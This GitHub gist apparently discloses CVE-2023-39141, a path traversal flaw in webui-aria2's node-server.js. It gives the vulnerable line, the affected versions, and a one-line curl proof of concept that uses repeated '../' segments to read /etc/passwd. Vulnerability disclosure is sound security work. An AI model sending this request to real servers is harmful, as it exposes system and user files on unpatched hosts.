Created
August 14, 2023 15:11
-
-
Save JafarAkhondali/528fe6c548b78f454911fb866b23f66e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2023-39141 is reserved for this vulnerability | |
| Project link: | |
| https://github.com/ziahamza/webui-aria2/ | |
| Vulnerability type: | |
| Path traversal | |
| Root cause: This line https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 accepts file name from URL input, without sanitizing it to be in the same directory. | |
| PoC: | |
| When `node-server.js` is used, an attacker can simply request files outside the serving path | |
| `curl --path-as-is http://localhost:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd` | |
| Root cause: Attacker may read any file that the www user can read. | |
| Vulnerable versions: | |
| Right now all versions even latest commit "109903f0e2774cf948698cd95a01f77f33d7dd2c" are vulnerable. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment